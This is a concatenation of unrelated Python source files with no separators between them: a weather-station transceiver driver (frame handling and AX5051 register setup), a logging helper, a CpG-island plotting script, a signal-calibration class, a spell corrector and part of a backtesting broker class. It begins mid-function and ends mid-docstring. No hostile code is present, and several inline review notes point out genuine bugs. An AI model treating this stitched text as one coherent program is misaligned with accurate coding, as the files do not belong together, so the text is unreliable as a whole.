        self.DataStore.setLastStatCache(seen_ts=int(time.time()),
                                        quality=(Buffer[0][3] & 0x7f))
        # device checksum from bytes 4-5 (big-endian)
        cs = newBuffer[0][5] | (newBuffer[0][4] << 8)
        if (Buffer[0][2] & 0xEF) == EResponseType.rtReqFirstConfig:
            logdbg('handleNextAction: a1 (first-time config)')
            self.setSleep(0.085,0.005)
            newLength[0] = self.buildFirstConfigFrame(newBuffer, cs)
        elif (Buffer[0][2] & 0xEF) == EResponseType.rtReqSetConfig:
            logdbg('handleNextAction: a2 (set config data)')
            self.setSleep(0.085,0.005)
            newLength[0] = self.buildConfigFrame(newBuffer)
        elif (Buffer[0][2] & 0xEF) == EResponseType.rtReqSetTime:
            logdbg('handleNextAction: a3 (set time data)')
            now = int(time.time())
            age = now - self.DataStore.LastStat.last_weather_ts
            if age >= (self.DataStore.getCommModeInterval() +1) * 2:
                # always set time if init or stale communication
                self.setSleep(0.085,0.005)
                newLength[0] = self.buildTimeFrame(newBuffer, cs)
            else:
                # When time is set at the whole hour we may get an extra
                # historical record with time stamp a history period ahead
                # We will skip settime if offset to whole hour is too small
                # (time difference between WS and server < self._a3_offset)
                m, s = divmod(now, 60)
                h, m = divmod(m, 60)
                # NOTE(review): logs minutes:seconds despite the 'hh' label
                logdbg('Time: hh:%02d:%02d' % (m,s))
                if (m == 59 and s >= (60 - self._a3_offset)) or (m == 0 and s <= self._a3_offset):
                    logdbg('Skip settime; time difference <= %s s' % int(self._a3_offset))
                    self.setSleep(0.300,0.010)
                    newLength[0] = self.buildACKFrame(newBuffer, EAction.aGetHistory, cs)
                else:
                    # set time
                    self.setSleep(0.085,0.005)
                    newLength[0] = self.buildTimeFrame(newBuffer, cs)
        else:
            # unrecognized request type: acknowledge and ask for history
            logdbg('handleNextAction: %02x' % (Buffer[0][2] & 0xEF))
            self.setSleep(0.300,0.010)
            newLength[0] = self.buildACKFrame(newBuffer, EAction.aGetHistory, cs)

        Length[0] = newLength[0]
        Buffer[0] = newBuffer[0]

    def generateResponse(self, Buffer, Length):
        """Dispatch an incoming frame to the proper handler and build a reply.

        Buffer and Length are single-element lists used as in/out
        parameters.  Raises BadResponse on malformed frames and
        DataWritten when the console confirms a config/time write.
        """
        if DEBUG_COMM > 1:
            logdbg('generateResponse: %s' % self.timing())
        newBuffer = [0]
        newBuffer[0] = Buffer[0]
        newLength = [0]
        newLength[0] = Length[0]
        if Length[0] == 0:
            raise BadResponse('zero length buffer')

        # device id from bytes 0-1; response type is the top 3 bits of byte 2
        bufferID = (Buffer[0][0] <<8) | Buffer[0][1]
        respType = (Buffer[0][2] & 0xE0)
        if DEBUG_COMM > 1:
            logdbg("generateResponse: id=%04x resp=%x length=%x" %
                   (bufferID, respType, Length[0]))
        deviceID = self.DataStore.getDeviceID()
        # 0xF0F0 is the broadcast id used by an unpaired console
        if bufferID != 0xF0F0:
            self.DataStore.setRegisteredDeviceID(bufferID)

        if bufferID == 0xF0F0:
            loginf('generateResponse: console not paired, attempting to pair to 0x%04x' % deviceID)
            newLength[0] = self.buildACKFrame(newBuffer, EAction.aGetConfig, deviceID, 0xFFFF)
        elif bufferID == deviceID:
            # each response type carries a fixed-length payload; a mismatch
            # between type and length means the frame is corrupt
            if respType == EResponseType.rtDataWritten:
                #    00000000: 00 00 06 00 32 20
                if Length[0] == 0x06:
                    self.DataStore.StationConfig.setResetMinMaxFlags(0)
                    self.shid.setRX()
                    raise DataWritten()
                else:
                    raise BadResponse('len=%x resp=%x' % (Length[0], respType))
            elif respType == EResponseType.rtGetConfig:
                #    00000000: 00 00 30 00 32 40
                if Length[0] == 0x30:
                    self.handleConfig(newBuffer, newLength)
                else:
                    raise BadResponse('len=%x resp=%x' % (Length[0], respType))
            elif respType == EResponseType.rtGetCurrentWeather:
                #    00000000: 00 00 d7 00 32 60
                if Length[0] == 0xd7: #215
                    self.handleCurrentData(newBuffer, newLength)
                else:
                    raise BadResponse('len=%x resp=%x' % (Length[0], respType))
            elif respType == EResponseType.rtGetHistory:
                #    00000000: 00 00 1e 00 32 80
                if Length[0] == 0x1e:
                    self.handleHistoryData(newBuffer, newLength)
                else:
                    raise BadResponse('len=%x resp=%x' % (Length[0], respType))
            elif respType == EResponseType.rtRequest:
                #    00000000: 00 00 06 f0 f0 a1
                #    00000000: 00 00 06 00 32 a3
                #    00000000: 00 00 06 00 32 a2
                if Length[0] == 0x06:
                    self.handleNextAction(newBuffer, newLength)
                else:
                    raise BadResponse('len=%x resp=%x' % (Length[0], respType))
            else:
                raise BadResponse('unexpected response type %x' % respType)
        elif respType not in [0x20,0x40,0x60,0x80,0xa1,0xa2,0xa3]:
            # message is probably corrupt
            # NOTE(review): respType was masked with 0xE0 above, so 0xa1/0xa2/
            # 0xa3 can never appear here; 0xa0 is what the mask would actually
            # produce for request frames -- confirm intent.
            raise BadResponse('unknown response type %x' % respType)
        else:
            msg = 'message from console contains unknown device ID (id=%04x resp=%x)' % (bufferID, respType)
            logdbg(msg)
            log_frame(Length[0],Buffer[0])
            raise BadResponse(msg)

        Buffer[0] = newBuffer[0]
        Length[0] = newLength[0]

    def configureRegisterNames(self):
        """Load the default AX5051 transceiver register values into
        self.reg_names, keyed by register address."""
        regs = self.AX5051RegisterNames
        defaults = (
            (regs.IFMODE,     0x00),
            (regs.MODULATION, 0x41),  # fsk
            (regs.ENCODING,   0x07),
            (regs.FRAMING,    0x84),  # 1000:0100 ##?hdlc? |1000 010 0
            (regs.CRCINIT3,   0xff),
            (regs.CRCINIT2,   0xff),
            (regs.CRCINIT1,   0xff),
            (regs.CRCINIT0,   0xff),
            (regs.FREQ3,      0x38),
            (regs.FREQ2,      0x90),
            (regs.FREQ1,      0x00),
            (regs.FREQ0,      0x01),
            (regs.PLLLOOP,    0x1d),
            (regs.PLLRANGING, 0x08),
            (regs.PLLRNGCLK,  0x03),
            (regs.MODMISC,    0x03),
            (regs.SPAREOUT,   0x00),
            (regs.TESTOBS,    0x00),
            (regs.APEOVER,    0x00),
            (regs.TMMUX,      0x00),
            (regs.PLLVCOI,    0x01),
            (regs.PLLCPEN,    0x01),
            (regs.RFMISC,     0xb0),
            (regs.REF,        0x23),
            (regs.IFFREQHI,   0x20),
            (regs.IFFREQLO,   0x00),
            (regs.ADCMISC,    0x01),
            (regs.AGCTARGET,  0x0e),
            (regs.AGCATTACK,  0x11),
            (regs.AGCDECAY,   0x0e),
            (regs.CICDEC,     0x3f),
            (regs.DATARATEHI, 0x19),
            (regs.DATARATELO, 0x66),
            (regs.TMGGAINHI,  0x01),
            (regs.TMGGAINLO,  0x96),
            (regs.PHASEGAIN,  0x03),
            (regs.FREQGAIN,   0x04),
            (regs.FREQGAIN2,  0x0a),
            (regs.AMPLGAIN,   0x06),
            (regs.AGCMANUAL,  0x00),
            (regs.ADCDCLEVEL, 0x10),
            (regs.RXMISC,     0x35),
            (regs.FSKDEV2,    0x00),
            (regs.FSKDEV1,    0x31),
            (regs.FSKDEV0,    0x27),
            (regs.TXPWR,      0x03),
            (regs.TXRATEHI,   0x00),
            (regs.TXRATEMID,  0x51),
            (regs.TXRATELO,   0xec),
            (regs.TXDRIVER,   0x88),
        )
        for register, value in defaults:
            self.reg_names[register] = value

    def initTransceiver(self, frequency_standard):
        """Initialize the transceiver: tune frequency registers, read the
        device id and serial number from config flash, then write all
        AX5051 registers to the hardware."""
        logdbg('initTransceiver: frequency_standard=%s' % frequency_standard)

        self.DataStore.setFrequencyStandard(frequency_standard)
        self.configureRegisterNames()

        # calculate the frequency then set frequency registers
        freq = self.DataStore.TransceiverSettings.Frequency
        loginf('base frequency: %d' % freq)
        # convert Hz to the 24-bit register scale (16 MHz reference / 2^24)
        freqVal =  long(freq / 16000000.0 * 16777216.0)
        corVec = [None]
        # 4-byte big-endian frequency correction stored in config flash @0x1F5
        self.shid.readConfigFlash(0x1F5, 4, corVec)
        corVal = corVec[0][0] << 8
        corVal |= corVec[0][1]
        corVal <<= 8
        corVal |= corVec[0][2]
        corVal <<= 8
        corVal |= corVec[0][3]
        loginf('frequency correction: %d (0x%x)' % (corVal,corVal))
        freqVal += corVal
        # force the register value to be odd -- presumably a hardware
        # requirement; TODO confirm against AX5051 datasheet
        if not (freqVal % 2):
            freqVal += 1
        loginf('adjusted frequency: %d (0x%x)' % (freqVal,freqVal))
        self.reg_names[self.AX5051RegisterNames.FREQ3] = (freqVal >>24) & 0xFF
        self.reg_names[self.AX5051RegisterNames.FREQ2] = (freqVal >>16) & 0xFF
        self.reg_names[self.AX5051RegisterNames.FREQ1] = (freqVal >>8)  & 0xFF
        self.reg_names[self.AX5051RegisterNames.FREQ0] = (freqVal >>0)  & 0xFF
        logdbg('frequency registers: %x %x %x %x' % (
                self.reg_names[self.AX5051RegisterNames.FREQ3],
                self.reg_names[self.AX5051RegisterNames.FREQ2],
                self.reg_names[self.AX5051RegisterNames.FREQ1],
                self.reg_names[self.AX5051RegisterNames.FREQ0]))

        # figure out the transceiver id (bytes 5-6 of config flash @0x1F9)
        buf = [None]
        self.shid.readConfigFlash(0x1F9, 7, buf)
        tid  = buf[0][5] << 8
        tid += buf[0][6]
        loginf('transceiver identifier: %d (0x%04x)' % (tid,tid))
        self.DataStore.setDeviceID(tid)

        # figure out the transceiver serial number: all 7 bytes rendered as
        # zero-padded decimal pairs
        sn  = str("%02d"%(buf[0][0]))
        sn += str("%02d"%(buf[0][1]))
        sn += str("%02d"%(buf[0][2]))
        sn += str("%02d"%(buf[0][3]))
        sn += str("%02d"%(buf[0][4]))
        sn += str("%02d"%(buf[0][5]))
        sn += str("%02d"%(buf[0][6]))
        loginf('transceiver serial: %s' % sn)
        self.DataStore.setTransceiverSerNo(sn)

        # push the full register set to the hardware
        for r in self.reg_names:
            self.shid.writeReg(r, self.reg_names[r])

    def setup(self, frequency_standard,
              vendor_id, product_id, device_id, serial,
              comm_interval=3):
        """Open the USB transceiver, initialize it, and mark it present."""
        self.DataStore.setCommModeInterval(comm_interval)
        self.shid.open(vendor_id, product_id, device_id, serial)
        self.initTransceiver(frequency_standard)
        self.DataStore.setTransceiverPresent(True)

    def teardown(self):
        """Close the USB connection to the transceiver."""
        self.shid.close()

    # FIXME: make this thread-safe
    def getWeatherData(self):
        """Return the most recent current-weather snapshot."""
        return self.DataStore.CurrentWeather

    # FIXME: make this thread-safe
    def getLastStat(self):
        """Return the latest communication statistics object."""
        return self.DataStore.LastStat

    # FIXME: make this thread-safe
    def getConfigData(self):
        """Return the station configuration object."""
        return self.DataStore.StationConfig

    def startCachingHistory(self, since_ts=0, num_rec=0):
        """Begin accumulating history records.

        since_ts -- only keep records with a timestamp at or after this
                    epoch time (None is treated as 0, i.e. keep all)
        num_rec  -- explicit number of records to fetch; clipped to the
                    station's capacity
        """
        self.history_cache.clear_records()
        self.history_cache.since_ts = 0 if since_ts is None else since_ts
        # never request more records than the station can actually hold
        limit = WS28xxDriver.max_records - 2
        self.history_cache.num_rec = num_rec if num_rec <= limit else limit
        self.command = EAction.aGetHistory

    def stopCachingHistory(self):
        """Stop requesting history records from the console."""
        self.command = None

    def getUncachedHistoryCount(self):
        """Return how many requested history records are still outstanding."""
        return self.history_cache.num_outstanding_records

    def getNextHistoryIndex(self):
        """Return the index of the next history record to fetch."""
        return self.history_cache.next_index

    def getNumHistoryScanned(self):
        """Return the number of history records examined so far."""
        return self.history_cache.num_scanned

    def getLatestHistoryIndex(self):
        """Return the newest history index reported by the console."""
        return self.DataStore.LastStat.LatestHistoryIndex

    def getHistoryCacheRecords(self):
        """Return the list of history records accumulated so far."""
        return self.history_cache.records

    def clearHistoryCache(self):
        """Discard any cached history records."""
        self.history_cache.clear_records()

    def startRFThread(self):
        """Spawn the RF communication thread; no-op if already running."""
        if self.child is not None:
            return
        logdbg('startRFThread: spawning RF thread')
        self.running = True
        rf_thread = threading.Thread(target=self.doRF, name='RFComm')
        # daemonize so the thread cannot keep the process alive on exit
        rf_thread.daemon = True
        self.child = rf_thread
        self.child.start()

    def stopRFThread(self):
        """Signal the RF thread to stop and wait up to thread_wait seconds."""
        self.running = False
        logdbg('stopRFThread: waiting for RF thread to terminate')
        self.child.join(self.thread_wait)
        if self.child.isAlive():
            logerr('unable to terminate RF thread after %d seconds' %
                   self.thread_wait)
        else:
            # only forget the thread once it has actually exited
            self.child = None

    def isRunning(self):
        """Return True while the RF thread is supposed to be running."""
        return self.running

    def doRF(self):
        """RF thread body: set up communication, then poll until stopped.

        Any exception is logged, stops the thread, and is re-raised.
        """
        try:
            logdbg('setting up rf communication')
            self.doRFSetup()
            logdbg('starting rf communication')
            while self.running:
                self.doRFCommunication()
        except Exception, e:
            logerr('exception in doRF: %s' % e)
            if weewx.debug:
                log_traceback(dst=syslog.LOG_DEBUG)
            self.running = False
            raise
        finally:
            logdbg('stopping rf communication')

    # it is probably not necessary to have two setPreamblePattern invocations.
    # however, HeavyWeatherPro seems to do it this way on a first time config.
    # doing it this way makes configuration easier during a factory reset and
    # when re-establishing communication with the station sensors.
    def doRFSetup(self):
        """Prepare the transceiver for receiving: preamble, state, RX mode."""
        self.shid.execute(5)
        self.shid.setPreamblePattern(0xaa)
        self.shid.setState(0)
        time.sleep(1)
        self.shid.setRX()

        self.shid.setPreamblePattern(0xaa)
        self.shid.setState(0x1e)
        time.sleep(1)
        self.shid.setRX()
        # fast polling until the first frame arrives
        self.setSleep(0.085,0.005)

    def doRFCommunication(self):
        """One polling cycle: wait for a frame-ready state, then read a
        frame, generate the response, and transmit it."""
        time.sleep(self.firstSleep)
        self.pollCount = 0
        while self.running:
            StateBuffer = [None]
            self.shid.getState(StateBuffer)
            self.pollCount += 1
            # 0x16 indicates a frame is ready to be read
            if StateBuffer[0][0] == 0x16:
                break
            time.sleep(self.nextSleep)
        else:
            # loop ended because self.running went false, not because a
            # frame arrived -- nothing to process
            return

        DataLength = [0]
        DataLength[0] = 0
        FrameBuffer=[0]
        FrameBuffer[0]=[0]*0x03
        self.shid.getFrame(FrameBuffer, DataLength)
        try:
            self.generateResponse(FrameBuffer, DataLength)
            self.shid.setFrame(FrameBuffer[0], DataLength[0])
        except BadResponse, e:
            logerr('generateResponse failed: %s' % e)
        except DataWritten, e:
            logdbg('SetTime/SetConfig data written')
        self.shid.setTX()

    # these are for diagnostics and debugging
    def setSleep(self, firstsleep, nextsleep):
        """Set the initial and per-poll delays used by doRFCommunication."""
        self.firstSleep = firstsleep
        self.nextSleep = nextsleep

    def timing(self):
        """Describe the sleep/poll timing of the last communication cycle."""
        total = self.firstSleep + self.nextSleep * (self.pollCount - 1)
        return 'sleep=%s first=%s next=%s count=%s' % (
            total, self.firstSleep, self.nextSleep, self.pollCount)

#
# logutil.py
# A module containing means of interacting with log files.
#

import logging
import logging.handlers
import os
import time

from data_structures import enum
from config import get_config_value


# Closed set of subsystems a logger can belong to; enum() also provides
# reverse_mapping for value->name lookups (used by get_logger below).
LoggingSection = enum(
    'CLIENT',
    'CRAWLER',
    'DATA',
    'FRONTIER',
    'TEST',
    'UTILITIES',
)

#region Setup
# Root logger: INFO with a timestamped format.
logging.basicConfig(level=logging.INFO,
                    format='[%(asctime)s %(levelname)s] %(name)s::%(funcName)s - %(message)s',
                    datefmt='%x %X %Z')
# Resolve log file and directory paths relative to this module, from config.
module_dir = os.path.dirname(__file__)
logfile = os.path.join(module_dir, get_config_value('LOG', 'path'))
logdir = os.path.join(module_dir, get_config_value('LOG', 'dir'))

# Create the log directory on first use.
# NOTE(review): check-then-create is racy if two processes start at once.
if not os.path.exists(logdir):
    os.mkdir(logdir)

# Shared rotating file handler attached by get_logger() to every logger.
handler = logging.handlers.RotatingFileHandler(logfile,
                                               maxBytes=8192,
                                               backupCount=10, )
formatter = logging.Formatter('[%(asctime)s %(levelname)s] %(name)s::%(funcName)s - %(message)s')
formatter.datefmt = '%x %X %Z'
formatter.converter = time.gmtime  # log timestamps in UTC
handler.setFormatter(formatter)
#endregion


def get_logger(section, name):
    """
    Fetches a logger.

    Arguments:
        section (string): The section the logger is attributed to.
        name (string): The name of the logger.

    Returns:
        The logger corresponding to the section and name provided.
    """
    section_name = LoggingSection.reverse_mapping[section].lower()

    logger = logging.getLogger('htresearch.{0}.{1}'.format(section_name, name))
    # logging.getLogger returns a cached instance, so calling get_logger
    # twice for the same section/name would attach the shared handler twice
    # and duplicate every record -- guard against re-adding it.
    if handler not in logger.handlers:
        logger.addHandler(handler)
    logger.setLevel(logging.INFO)

    return logger
#!/usr/bin/env python

'''
Purpose:
This script, using default values, determines and plots the CpG islands in 
relation to a given feature "type" (e.g. "gene" or "mRNA") from a GFF file 
which corresponds to the user-provided fasta file.

Note:
CpG Islands are determined by ObEx = (Observed CpG) / (Expected CpG) ,
default threshold > 1. 

Where Expected CpG = (count(C) * count(G)) / WindowSize

Usage:
python cpg_gene.py FastaFile Gff_File OutFile.png

Default optional parameters:
    -s, Step Size, default = 50
    -w, Window Size, default = 200
    -oe, Minimum Observed Expected CpG, default = 1
    -gc, Minimum GC, default = .5
    -r Range from ATG, or provided feature, default = 5000
    -f, GFF Feature, default = "gene"
    -i, Gene ID from GFF, default = ""
'''

import sys
import os
import argparse

from collections import Counter
from Bio import SeqIO
import cpgmod
import gffutils

import pandas as pd
import numpy as np
from ggplot import *


# Capture command line args, with or without defaults
if __name__ == '__main__':
    # Parse the arguments
    LineArgs = cpgmod.parseArguments()

# Populate vars with args
# NOTE(review): only the parse above is guarded by __main__; the lines below
# run on import too and would raise NameError because LineArgs would then be
# undefined -- confirm this module is never imported.
FastaFile = LineArgs.FastaFile
GffFile = LineArgs.GffFile
OutFile = LineArgs.FileOut
Step = LineArgs.s
WinSize = LineArgs.w
ObExthresh = LineArgs.oe
GCthresh = LineArgs.gc
StartRange = LineArgs.r
FeatGFF = LineArgs.f
ID_Feat = LineArgs.i

# Gather all possible CpG islands
# Candidate windows from every sequence in the fasta are pooled into one list.
MergedRecs = []
print "Parsing sequences...\n"
for SeqRecord in SeqIO.parse(FastaFile, "fasta"):
    print SeqRecord.id
    # Determine if sequences and args are acceptable
    cpgmod.arg_seqcheck(SeqRecord, WinSize, Step)
    # Pre-determine number of islands
    NumOfChunks = cpgmod.chunks(SeqRecord, WinSize, Step)
    # Return array of SeqRec class (potential CpG island) instances
    SeqRecList = cpgmod.compute(SeqRecord, Step, NumOfChunks, WinSize)
    MergedRecs = MergedRecs + SeqRecList

# Create GFF DB
# force=True overwrites any stale GFF.db left from a previous run; the file
# is removed again at the end of the script.
GffDb = gffutils.create_db(GffFile, dbfn='GFF.db', force=True, keep_order=True, 
                            merge_strategy='merge', sort_attribute_values=True,
                            disable_infer_transcripts=True,
                            disable_infer_genes=True)

print "\nGFF Database Created...\n"

# Filter out SeqRec below threshold
# Keep only windows whose observed/expected CpG ratio and GC content both
# exceed the user thresholds, and which lie near a feature of interest.
DistArr = []
for Rec in MergedRecs:
    # windows with zero expected CpG would divide by zero below
    if Rec.expect() > 0:
        ObEx = (Rec.observ() / Rec.expect())
        if ObEx > ObExthresh and Rec.gc_cont() > GCthresh:
            # Query GFF DB for closest gene feature *or provided feature*
            Arr = cpgmod.get_closest(Rec, GffDb, StartRange, FeatGFF, ID_Feat)
            # get_closest returns False when no feature is within range
            if Arr != False:
                Arr.append(ObEx)
                DistArr.append(Arr)

print "CpG Islands predicted...\n"
print "Generating Figure...\n"

# Releasing SeqRecs
MergedRecs = None
SeqRecList = None

# Pre-check DistArr Results
# fewer than two points makes the scatter plot meaningless; warn but continue
if len(DistArr) < 2:
    print "WARNING, "+ str(len(DistArr)) + " sites were found."
    print "Consider changing parameters.\n"

# Generate Figure:
ObExRes = pd.DataFrame({
                    'gene' : [],
                    'xval': [],
                    'yval': []})

try:
    Cnt = 0
    for Dist in DistArr:
        Cnt += 1
        print "PROGRESS: "+str(Cnt) +" of "+ str(len(DistArr))
        ObExdf = pd.DataFrame({
                        'gene': [Dist[2]],
                        'xval': [Dist[1]],
                        'yval': [Dist[3]]})
        ObExFram = [ObExRes, ObExdf]
        ObExRes = pd.concat(ObExFram, ignore_index=True)
    p = ggplot(aes(x='xval', y='yval'), data=ObExRes) \
        + geom_point() \
        + ylab("Observed/Expected CpG") \
        + xlab("Position (bp) Relative to (ATG = 0)") \
        + ggtitle("Predicted CpG Island Position Relative to ATG")
    p.save(OutFile)
except IndexError as e:
    print 'Error: '+ str(e)
    sys.exit('Exiting script...')
print p

# Remove GFF DB
os.remove('GFF.db')


import numpy as np
from scipy import sparse
from scipy.interpolate import interp1d

class calibration(object):
	'''
	some useful tools for manual calibration
	'''
	def normalize_zdata(self,z_data,cal_z_data):
		'''Divide out a full complex calibration trace.'''
		return z_data/cal_z_data
		
	def normalize_amplitude(self,z_data,cal_ampdata):
		'''Divide out an amplitude-only calibration trace.'''
		return z_data/cal_ampdata
		
	def normalize_phase(self,z_data,cal_phase):
		'''Remove a phase offset (in radians) from the data.'''
		return z_data*np.exp(-1j*cal_phase)
		
	def normalize_by_func(self,f_data,z_data,func):
		'''Divide z_data by a baseline function evaluated at f_data.'''
		return z_data/func(f_data)
		
	def _baseline_als(self,y, lam, p, niter=10):
		'''
		Asymmetric least squares baseline estimation.
		see http://zanran_storage.s3.amazonaws.com/www.science.uva.nl/ContentPages/443199618.pdf
		"Asymmetric Least Squares Smoothing" by P. Eilers and H. Boelens in 2005.
		http://stackoverflow.com/questions/29156532/python-baseline-correction-library
		"There are two parameters: p for asymmetry and lambda for smoothness. Both have to be
		tuned to the data at hand. We found that generally 0.001<=p<=0.1 is a good choice
		(for a trace with positive peaks) and 10e2<=lambda<=10e9, but exceptions may occur."
		'''
		L = len(y)
		# second-order difference matrix: penalizes curvature of the baseline
		D = sparse.csc_matrix(np.diff(np.eye(L), 2))
		w = np.ones(L)
		# NOTE(review): sparse.linalg is used below but only `from scipy
		# import sparse` is at the top of the file -- if this raises
		# AttributeError, add an explicit `import scipy.sparse.linalg`.
		for i in range(niter):
			W = sparse.spdiags(w, 0, L, L)
			Z = W + lam * D.dot(D.transpose())
			z = sparse.linalg.spsolve(Z, w*y)
			# asymmetric weights: points above the fit get weight p,
			# points below get 1-p
			w = p * (y > z) + (1-p) * (y < z)
		return z
		
	def fit_baseline_amp(self,z_data,lam,p,niter=10):
		'''
		for this to work, you need to analyze a large part of the baseline
		tune lam and p until you get the desired result
		'''
		return self._baseline_als(np.absolute(z_data),lam,p,niter=niter)
	
	def baseline_func_amp(self,z_data,f_data,lam,p,niter=10):
		'''
		for this to work, you need to analyze a large part of the baseline
		tune lam and p until you get the desired result
		returns the baseline as a function
		the points in between the datapoints are computed by cubic interpolation
		'''
		return interp1d(f_data, self._baseline_als(np.absolute(z_data),lam,p,niter=niter), kind='cubic')
		
	def baseline_func_phase(self,z_data,f_data,lam,p,niter=10):
		'''
		for this to work, you need to analyze a large part of the baseline
		tune lam and p until you get the desired result
		returns the baseline as a function
		the points in between the datapoints are computed by cubic interpolation
		'''
		return interp1d(f_data, self._baseline_als(np.angle(z_data),lam,p,niter=niter), kind='cubic')
		
	def fit_baseline_phase(self,z_data,lam,p,niter=10):
		'''
		for this to work, you need to analyze a large part of the baseline
		tune lam and p until you get the desired result
		'''
		return self._baseline_als(np.angle(z_data),lam,p,niter=niter)

	def GUIbaselinefit(self):
		'''
		A GUI to help you fit the baseline
		Interactively tunes lam/p with sliders, then divides the fitted
		baseline out of self.z_data_raw in place.
		'''
		self.__lam = 1e6
		self.__p = 0.9
		niter = 10
		self.__baseline = self._baseline_als(np.absolute(self.z_data_raw),self.__lam,self.__p,niter=niter)
		import matplotlib.pyplot as plt
		from matplotlib.widgets import Slider
		fig, (ax0,ax1) = plt.subplots(nrows=2)
		plt.suptitle('Use the sliders to make the green curve match the baseline.')
		plt.subplots_adjust(left=0.25, bottom=0.25)
		l0, = ax0.plot(np.absolute(self.z_data_raw))
		l0b, = ax0.plot(np.absolute(self.__baseline))
		l1, = ax1.plot(np.absolute(self.z_data_raw/self.__baseline))
		ax0.set_ylabel('amp, rawdata vs. baseline')
		ax1.set_ylabel('amp, corrected')
		axcolor = 'lightgoldenrodyellow'
		# NOTE(review): the 'axisbg' keyword was removed in matplotlib 2.x;
		# newer versions require 'facecolor' instead.
		axSmooth = plt.axes([0.25, 0.1, 0.65, 0.03], axisbg=axcolor)
		axAsym = plt.axes([0.25, 0.15, 0.65, 0.03], axisbg=axcolor)
		axbcorr = plt.axes([0.25, 0.05, 0.65, 0.03], axisbg=axcolor)
		# smoothness slider works in log10(lam) space
		sSmooth = Slider(axSmooth, 'Smoothness', 0.1, 10., valinit=np.log10(self.__lam),valfmt='1E%f')
		sAsym = Slider(axAsym, 'Asymmetry', 1e-4,0.99999, valinit=self.__p,valfmt='%f')
		sbcorr = Slider(axbcorr, 'vertical shift',0.7,1.1,valinit=1.)
		def update(val):
			# recompute the baseline with the current slider values
			self.__lam = 10**sSmooth.val
			self.__p = sAsym.val
			self.__baseline = sbcorr.val*self._baseline_als(np.absolute(self.z_data_raw),self.__lam,self.__p,niter=niter)
			l0.set_ydata(np.absolute(self.z_data_raw))
			l0b.set_ydata(np.absolute(self.__baseline))
			l1.set_ydata(np.absolute(self.z_data_raw/self.__baseline))
			fig.canvas.draw_idle()
		sSmooth.on_changed(update)
		sAsym.on_changed(update)
		sbcorr.on_changed(update)
		plt.show()
		# apply the accepted baseline to the raw data in place
		self.z_data_raw /= self.__baseline
		plt.close()
		
		
		
		
		
## mostly copied from: http://norvig.com/spell-correct.html

import sys, random
import re, collections, time

# Module-level state: corpus path and the trained word-frequency model
# (populated in the __main__ block below).
TXT_FILE='';
BUF_DIR='';
NWORDS=None;

def words(text):
    """Extract every run of lowercase letters from text as a list."""
    return re.findall('[a-z]+', text)

def train(features):
    """Build a word-frequency model.

    Seen words map to occurrence count + 1; unseen words default to 1
    (add-one smoothing via the defaultdict factory).
    """
    counted = collections.Counter(features)
    model = collections.defaultdict(lambda: 1)
    for word, count in counted.items():
        model[word] = count + 1
    return model

alphabet = 'abcdefghijklmnopqrstuvwxyz'

def edits1(word):
    """Return the set of all strings one edit away from word
    (deletion, adjacent transposition, replacement, or insertion)."""
    results = set()
    for i in range(len(word) + 1):
        head, tail = word[:i], word[i:]
        if tail:
            results.add(head + tail[1:])                       # deletion
        if len(tail) > 1:
            results.add(head + tail[1] + tail[0] + tail[2:])   # transposition
        for ch in alphabet:
            if tail:
                results.add(head + ch + tail[1:])              # replacement
            results.add(head + ch + tail)                      # insertion
    return results

def known_edits2(word):
    """Words from the NWORDS model reachable by exactly two single edits."""
    hits = set()
    for first in edits1(word):
        for second in edits1(first):
            if second in NWORDS:
                hits.add(second)
    return hits

def known(words):
    """Return the subset of words present in the NWORDS model."""
    return {candidate for candidate in words if candidate in NWORDS}

def correct(word):
    """Return the most probable spelling correction for word.

    Prefers the word itself if known, then known words at edit distance
    one, then two; falls back to the input unchanged.
    """
    candidates = known([word])
    if not candidates:
        candidates = known(edits1(word))
    if not candidates:
        candidates = known_edits2(word)
    if not candidates:
        return word
    return max(candidates, key=NWORDS.get)

#######################################################################################
if __name__ == '__main__':
 TXT_FILE = sys.argv[1]

 # build the frequency model from the corpus and time it
 # NOTE(review): file() and time.clock() are Python 2 only
 t0 = time.clock()
 o_words = words(file(TXT_FILE).read())
 NWORDS = train(o_words)
 #print time.clock() - t0, " seconds build time"
 #print "dictionary size: %d" %len(NWORDS)
 et1 = time.clock() - t0

 # benchmark correct() on the first t_count words plus scrambled variants
 t_count = 10
 rl = o_words[0:t_count] #random.sample(o_words, t_count)
 # NOTE(review): scrambles every corpus word although only the first
 # t_count entries are consumed by the zip below
 orl = [''.join(random.sample(word, len(word))) for word in o_words]
 t1 = time.clock()
 r_count = 10
 for i in range(0, r_count):
  for w1, w2 in zip(rl, orl):
   correct(w1); correct(w2)
 et2 = (time.clock() - t1)/t_count/r_count/2

 # corpus size, build seconds, mean seconds per correction
 print '%d\t%f\t%f' %(len(NWORDS), et1, et2)
#######################################################################################
print 'Done'

#!/usr/bin/env python
# -*- coding: utf-8; py-indent-offset:4 -*-
###############################################################################
#
# Copyright (C) 2015 Daniel Rodriguez
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program.  If not, see <http://www.gnu.org/licenses/>.
#
###############################################################################
from __future__ import (absolute_import, division, print_function,
                        unicode_literals)

import collections

import six

from .comminfo import CommissionInfo
from .position import Position
from .metabase import MetaParams
from .order import Order, BuyOrder, SellOrder


class BrokerBack(six.with_metaclass(MetaParams, object)):
    """Backtesting broker.

    Tracks cash, per-data positions and commission schemes, accepts
    buy/sell orders and matches the pending ones against each new bar
    in :meth:`next`.
    """

    params = (('cash', 10000.0), ('commission', CommissionInfo()),)

    def __init__(self):
        self.comminfo = dict()
        self.init()

    def init(self):
        """(Re)set the broker to its starting state.

        Called from ``__init__`` and again from :meth:`start` so the
        same broker instance can be reused across runs.
        """
        # Ensure there is always a default commission scheme under the
        # ``None`` key, used as fallback by getcommissioninfo.
        if None not in self.comminfo.keys():
            self.comminfo = dict({None: self.p.commission})

        self.startingcash = self.cash = self.p.cash

        self.orders = list()  # will only be appending
        self.pending = collections.deque()  # popleft and append(right)

        self.positions = collections.defaultdict(Position)
        self.notifs = collections.deque()

    def getcash(self):
        """Return the currently available cash."""
        return self.cash

    def setcash(self, cash):
        """Set starting and current cash (keeps the param in sync)."""
        self.startingcash = self.cash = self.p.cash = cash

    def getcommissioninfo(self, data):
        """Return the commission scheme for ``data``.

